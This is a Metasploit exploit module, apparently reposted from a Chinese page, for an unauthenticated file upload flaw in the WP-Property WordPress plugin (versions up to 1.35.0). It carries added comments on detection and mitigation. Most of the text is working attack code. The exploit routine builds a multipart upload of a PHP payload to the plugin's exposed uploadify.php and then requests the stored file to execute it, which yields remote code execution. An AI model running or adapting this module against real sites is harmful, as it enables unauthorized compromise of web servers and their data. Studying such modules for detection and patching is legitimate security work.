WordPress WP-Property PHP 文件上传漏洞
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##

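# Framework core, plus the PhpEXE mixin that the module class includes.
require 'msf/core'
require 'msf/core/exploit/php_exe'
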
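# Metasploit module for the file upload flaw in the WP-Property WordPress
# plugin. The module description lists versions <= 1.35.0 as affected.
#
# What the requests below show about the flaw (useful when reviewing a site
# or its logs):
# * third-party/uploadify/uploadify.php is reached with no cookie, nonce or
#   credentials in the request, so the upload handler is exposed to anyone;
# * the multipart body carries a client-chosen "folder" field and a file that
#   keeps its .php extension;
# * the handler's response body is then requested as a URI, i.e. the stored
#   file is served from a web-reachable, script-executing location.
#
# Detection: a POST to .../wp-property/third-party/uploadify/uploadify.php
# followed by a GET for a newly created .php file is the pattern this module
# produces. Mitigation (general hardening, not taken from this page): update
# or remove the plugin, block direct access to the bundled uploadify.php, and
# do not let the web server execute PHP from upload directories.
class Metasploit3 < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HttpClient
  include Msf::Exploit::PhpEXE

  # Registers the module metadata and the single TARGETURI option
  # (default '/wordpress').
  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'WordPress WP-Property PHP File Upload Vulnerability',
      'Description'    => %q{
          This module exploits a vulnerability found in WP-Property <= 1.35.0 WordPress
        plugin. By abusing the uploadify.php file, a malicious user can upload a file to a
        temp directory without authentication, which results in arbitrary code execution.
      },
      'Author'         =>
        [
          'Sammy FORGIT', # initial discovery
          'James Fitts <fitts.james[at]gmail.com>' # metasploit module
        ],
      'License'        => MSF_LICENSE,
      'References'     =>
        [
          [ 'OSVDB', '82656' ],
          [ 'BID', '53787' ],
          [ 'EDB', '18987'],
          [ 'URL', 'http://www.opensyscom.fr/Actualites/wordpress-plugins-wp-property-shell-upload-vulnerability.html' ]
        ],
      'Payload'        =>
        {
          'BadChars' => "\x00",
        },
      'Platform'       => 'php',
      'Arch'           => ARCH_PHP,
      'Targets'        =>
        [
          [ 'Generic (PHP Payload)', { 'Arch' => ARCH_PHP, 'Platform' => 'php' } ],
          [ 'Linux x86', { 'Arch' => ARCH_X86, 'Platform' => 'linux' } ]
        ],
      'DefaultTarget'  => 0,
      'DisclosureDate' => 'Mar 26 2012'))

    register_options(
      [
        OptString.new('TARGETURI', [true, 'The full URI path to WordPress', '/wordpress'])
      ], self.class)
  end

  # Requests the plugin's uploadify.php with a plain GET.
  #
  # Returns CheckCode::Unknown when there is no response or the status is not
  # 200, otherwise CheckCode::Appears. The result rests on the status code
  # alone: no plugin version is read, so a 200 only shows that the handler is
  # reachable, not that the installed release is an affected one.
  def check
    uri = target_uri.path
    uri << '/' if uri[-1,1] != '/'

    res = send_request_cgi({
      'method' => 'GET',
      'uri'    => "#{uri}wp-content/plugins/wp-property/third-party/uploadify/uploadify.php"
    })

    if not res or res.code != 200
      return Exploit::CheckCode::Unknown
    end

    return Exploit::CheckCode::Appears
  end

  # Sends the multipart upload to uploadify.php, then requests the location
  # returned in the response body. Fails with UnexpectedReply unless the
  # upload answer is a 200 whose body contains the generated file name.
  def exploit
    uri = target_uri.path
    uri << '/' if uri[-1,1] != '/'

    peer = "#{rhost}:#{rport}"

    # Random five-letter name; unlink_self asks the PhpEXE stub to delete
    # itself, so the file may no longer be on disk when a responder looks.
    @payload_name = "#{rand_text_alpha(5)}.php"
    php_payload = get_write_exec_payload(:unlink_self=>true)

    # Two form fields: the file ("Filedata") and the destination ("folder").
    # Both are supplied by the client, which is the root of the issue.
    data = Rex::MIME::Message.new
    data.add_part(php_payload, "application/octet-stream", nil, "form-data; name=\"Filedata\"; filename=\"#{@payload_name}\"")
    data.add_part("#{uri}wp-content/plugins/wp-property/third-party/uploadify/", nil, nil, "form-data; name=\"folder\"")
    # Drops the CRLF that precedes a boundary at the start of a line.
    post_data = data.to_s.gsub(/^\r\n\-\-\_Part\_/, '--_Part_')

    print_status("#{peer} - Uploading payload #{@payload_name}")
    res = send_request_cgi({
      'method' => 'POST',
      'uri'    => "#{uri}wp-content/plugins/wp-property/third-party/uploadify/uploadify.php",
      'ctype'  => "multipart/form-data; boundary=#{data.bound}",
      'data'   => post_data
    })

    if not res or res.code != 200 or res.body !~ /#{@payload_name}/
      fail_with(Exploit::Failure::UnexpectedReply, "#{peer} - Upload failed")
    end

    # The handler's reply is used verbatim as the path of the stored file.
    upload_uri = res.body

    print_status("#{peer} - Executing payload #{@payload_name}")
    res = send_request_raw({
      'uri'    => upload_uri,
      'method' => 'GET'
    })
  end
end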

不要问我这写的是什么 怎么利用 我是说msf.